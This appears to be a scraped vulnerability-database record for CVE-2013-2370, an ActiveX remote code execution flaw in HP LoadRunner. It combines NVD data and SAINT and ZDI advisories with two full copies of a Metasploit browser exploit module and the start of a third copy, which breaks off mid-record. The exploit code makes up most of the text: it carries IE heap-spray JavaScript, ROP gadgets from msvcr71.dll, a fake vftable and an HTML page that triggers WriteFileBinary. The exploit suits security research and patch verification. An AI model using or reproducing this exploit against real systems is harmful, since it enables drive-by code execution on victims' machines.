{"cve": [{"lastseen": "2021-02-02T06:06:51", "description": "Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1671.", "edition": 7, "cvss3": {}, "published": "2013-07-29T13:59:00", "title": "CVE-2013-2370", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2370"], "modified": "2019-10-09T23:07:00", "cpe": ["cpe:/a:hp:loadrunner:9.50.0", "cpe:/a:hp:loadrunner:9.52", "cpe:/a:hp:loadrunner:11.51", "cpe:/a:hp:loadrunner:9.51", "cpe:/a:hp:loadrunner:9.0.0", "cpe:/a:hp:loadrunner:11.50", "cpe:/a:hp:loadrunner:11.0.0.0"], "id": "CVE-2013-2370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2370", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hp:loadrunner:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:9.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:11.50:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:11.51:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:11.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:9.50.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "description": "Added: 08/29/2013 \nCVE: [CVE-2013-2370](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370>) \nBID: [61441](<http://www.securityfocus.com/bid/61441>) \nOSVDB: [95640](<http://www.osvdb.org/95640>) \n\n\n### Background\n\n[HP LoadRunner](<http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175451#.Uh-TiG2ZZdB>) is a software performance testing solution. HP LoadRunner includes the `**lrFileIOService**` ActiveX control. \n\n### Problem\n\nHP LoadRunner before 11.52 is vulnerable to remote code execution. The `**lrFileIOService**` ActiveX control exposes the `**WriteFileBinary**` method which accepts a parameter named data without validating the value. A remote attacker who persuades a vulnerable user to visit a malicious web page could execute arbitrary code in the context of the user. \n\n### Resolution\n\nUpgrade to HP LoadRunner 11.52 or higher as indicated in HP Security Bulletin [HPSBGN02905 SSRT101083](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03862772>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-182/> \n\n\n### Limitations\n\nThis exploit was tested against HP LoadRunner 11.50 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 or 9 on the target. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-08-29T00:00:00", "published": "2013-08-29T00:00:00", "id": "SAINT:F14F324A69B9FCF247F0CCD475E84FD4", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_loadrunner_lrfileioservice_writefilebinary_data", "type": "saint", "title": "HP LoadRunner lrFileIOService ActiveX Control WriteFileBinary Input Validation Error", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "edition": 2, "description": "Added: 08/29/2013 \nCVE: [CVE-2013-2370](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370>) \nBID: [61441](<http://www.securityfocus.com/bid/61441>) \nOSVDB: [95640](<http://www.osvdb.org/95640>) \n\n\n### Background\n\n[HP LoadRunner](<http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175451#.Uh-TiG2ZZdB>) is a software performance testing solution. HP LoadRunner includes the `**lrFileIOService**` ActiveX control. \n\n### Problem\n\nHP LoadRunner before 11.52 is vulnerable to remote code execution. The `**lrFileIOService**` ActiveX control exposes the `**WriteFileBinary**` method which accepts a parameter named data without validating the value. A remote attacker who persuades a vulnerable user to visit a malicious web page could execute arbitrary code in the context of the user. \n\n### Resolution\n\nUpgrade to HP LoadRunner 11.52 or higher as indicated in HP Security Bulletin [HPSBGN02905 SSRT101083](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03862772>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-182/> \n\n\n### Limitations\n\nThis exploit was tested against HP LoadRunner 11.50 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 or 9 on the target. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-29T00:00:00", "published": "2013-08-29T00:00:00", "id": "SAINT:63864CA83504F15CC45269FD1FD04E8C", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_loadrunner_lrfileioservice_writefilebinary_data", "type": "saint", "title": "HP LoadRunner lrFileIOService ActiveX Control WriteFileBinary Input Validation Error", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "description": "Added: 08/29/2013 \nCVE: [CVE-2013-2370](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370>) \nBID: [61441](<http://www.securityfocus.com/bid/61441>) \nOSVDB: [95640](<http://www.osvdb.org/95640>) \n\n\n### Background\n\n[HP LoadRunner](<http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175451#.Uh-TiG2ZZdB>) is a software performance testing solution. HP LoadRunner includes the `**lrFileIOService**` ActiveX control. \n\n### Problem\n\nHP LoadRunner before 11.52 is vulnerable to remote code execution. The `**lrFileIOService**` ActiveX control exposes the `**WriteFileBinary**` method which accepts a parameter named data without validating the value. A remote attacker who persuades a vulnerable user to visit a malicious web page could execute arbitrary code in the context of the user. \n\n### Resolution\n\nUpgrade to HP LoadRunner 11.52 or higher as indicated in HP Security Bulletin [HPSBGN02905 SSRT101083](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03862772>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-182/> \n\n\n### Limitations\n\nThis exploit was tested against HP LoadRunner 11.50 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 or 9 on the target. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-08-29T00:00:00", "published": "2013-08-29T00:00:00", "id": "SAINT:5404BF955A4F77C98E722EE7EC57C9FE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_loadrunner_lrfileioservice_writefilebinary_data", "title": "HP LoadRunner lrFileIOService ActiveX Control WriteFileBinary Input Validation Error", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-18T01:25:53", "description": "This Metasploit module exploits a vulnerability on the lrFileIOService ActiveX, as installed with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method where user provided data is used as a memory pointer. This Metasploit module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. This one is installed with HP LoadRunner.", "edition": 2, "published": "2013-08-29T00:00:00", "type": "zdt", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2013-08-29T00:00:00", "id": "1337DAY-ID-21178", "href": "https://0day.today/exploit/description/21178", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n \r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"9.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => Rank,\r\n :classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\",\r\n :method => \"WriteFileBinary\"\r\n })\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\r\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\r\n where user provided data is used as a memory pointer. This module has been tested\r\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\r\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\r\n used. This one is installed with HP LoadRunner.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2370' ],\r\n [ 'OSVDB', '95640' ],\r\n [ 'BID', '61441'],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-182/' ],\r\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # LrWebIERREWrapper.dll 11.50.2216.0\r\n [ 'Automatic', {} ],\r\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Jul 24 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n \r\n end\r\n \r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n \r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n \r\n ie_name = \"IE #{ie}\"\r\n \r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n end\r\n \r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n \r\n return nil\r\n end\r\n \r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n \r\n # Land the payload at 0x0c0c0c0c\r\n case my_target\r\n when targets[6]\r\n # IE 9 on Windows 7\r\n js = %Q|\r\n function randomblock(blocksize)\r\n {\r\n var theblock = \"\";\r\n for (var i = 0; i < blocksize; i++)\r\n {\r\n theblock += Math.floor(Math.random()*90)+10;\r\n }\r\n return theblock;\r\n }\r\n \r\n function tounescape(block)\r\n {\r\n var blocklen = block.length;\r\n var unescapestr = \"\";\r\n for (var i = 0; i < blocklen-1; i=i+4)\r\n {\r\n unescapestr += \"%u\" + block.substring(i,i+4);\r\n }\r\n return unescapestr;\r\n }\r\n \r\n var heap_obj = new heapLib.ie(0x10000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_random_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset_length = #{my_target['Offset']};\r\n for (var i=0; i < 0x1000; i++) {\r\n var padding = unescape(tounescape(randomblock(0x1000)));\r\n while (padding.length < 0x1000) padding+= padding;\r\n var junk_offset = padding.substring(0, offset_length);\r\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\r\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n heap_obj.alloc(sprayblock);\r\n }\r\n |\r\n \r\n else\r\n # For IE 6, 7, 8\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n \r\n end\r\n \r\n js = heaplib(js, {:noobfu => true})\r\n \r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n return js\r\n end\r\n \r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n \r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x0c0c0c14 # function pointer\r\n ].pack(\"V*\")\r\n \r\n # No rop. Just return the payload.\r\n return fake_object + code if t['Rop'].nil?\r\n \r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :jre\r\n print_status(\"Using msvcr71.dll ROP\")\r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn\r\n ].pack(\"V*\")\r\n rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})\r\n end\r\n \r\n return rop_payload\r\n end\r\n \r\n def load_exploit_html(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n object_id = rand_text_alpha(rand(10) + 8)\r\n \r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n <object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>\r\n <script language='javascript'>\r\n #{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c);\r\n </script>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n \r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n \r\nend\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21178"}], "zdi": [{"lastseen": "2020-06-22T11:42:21", "bulletinFamily": "info", "cvelist": ["CVE-2013-2370"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP LoadRunner. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the lrFileIOService ActiveX control. The control exposes the WriteFileBinary method which accepts a parameter named data that it uses as a valid pointer. By specifying invalid values an attacker can force the application to jump to a controlled location in memory. This can be exploited to execute remote code under the context of the user running the web browser.", "modified": "2013-06-22T00:00:00", "published": "2013-07-26T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-182/", "id": "ZDI-13-182", "title": "Hewlett-Packard LoadRunner lrFileIOService ActiveX Control WriteFileBinary Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T07:05:32", "description": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution. CVE-2013-2370. Remote exploit for windows platform", "published": "2013-08-29T00:00:00", "type": "exploitdb", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2013-08-29T00:00:00", "id": "EDB-ID:27939", "href": "https://www.exploit-db.com/exploits/27939/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"9.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => Rank,\r\n :classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\",\r\n :method => \"WriteFileBinary\"\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\r\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\r\n where user provided data is used as a memory pointer. This module has been tested\r\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\r\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\r\n used. This one is installed with HP LoadRunner.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2370' ],\r\n [ 'OSVDB', '95640' ],\r\n [ 'BID', '61441'],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-182/' ],\r\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # LrWebIERREWrapper.dll 11.50.2216.0\r\n [ 'Automatic', {} ],\r\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Jul 24 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n\r\n # Land the payload at 0x0c0c0c0c\r\n case my_target\r\n when targets[6]\r\n # IE 9 on Windows 7\r\n js = %Q|\r\n function randomblock(blocksize)\r\n {\r\n var theblock = \"\";\r\n for (var i = 0; i < blocksize; i++)\r\n {\r\n theblock += Math.floor(Math.random()*90)+10;\r\n }\r\n return theblock;\r\n }\r\n\r\n function tounescape(block)\r\n {\r\n var blocklen = block.length;\r\n var unescapestr = \"\";\r\n for (var i = 0; i < blocklen-1; i=i+4)\r\n {\r\n unescapestr += \"%u\" + block.substring(i,i+4);\r\n }\r\n return unescapestr;\r\n }\r\n\r\n var heap_obj = new heapLib.ie(0x10000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_random_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset_length = #{my_target['Offset']};\r\n for (var i=0; i < 0x1000; i++) {\r\n var padding = unescape(tounescape(randomblock(0x1000)));\r\n while (padding.length < 0x1000) padding+= padding;\r\n var junk_offset = padding.substring(0, offset_length);\r\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\r\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n heap_obj.alloc(sprayblock);\r\n }\r\n |\r\n\r\n else\r\n # For IE 6, 7, 8\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n\r\n end\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x0c0c0c14 # function pointer\r\n ].pack(\"V*\")\r\n\r\n # No rop. Just return the payload.\r\n return fake_object + code if t['Rop'].nil?\r\n\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :jre\r\n print_status(\"Using msvcr71.dll ROP\")\r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn\r\n ].pack(\"V*\")\r\n rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})\r\n end\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n object_id = rand_text_alpha(rand(10) + 8)\r\n\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n <object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>\r\n <script language='javascript'>\r\n #{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c);\r\n </script>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27939/"}], "metasploit": [{"lastseen": "2020-10-12T22:51:43", "description": "This module exploits a vulnerability on the lrFileIOService ActiveX, as installed with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method where user provided data is used as a memory pointer. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. This one is installed with HP LoadRunner.\n", "published": "2013-08-26T04:07:08", "type": "metasploit", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/HP_LOADRUNNER_WRITEFILEBINARY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"6.0\",\n # :ua_maxver => \"9.0\",\n # :javascript => true,\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => Rank,\n # :classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\",\n # :method => \"WriteFileBinary\"\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\",\n 'Description' => %q{\n This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\n where user provided data is used as a memory pointer. This module has been tested\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\n used. This one is installed with HP LoadRunner.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2370' ],\n [ 'OSVDB', '95640' ],\n [ 'BID', '61441'],\n [ 'ZDI', '13-182' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'DisableNops' => true,\n 'PrependEncoder' => 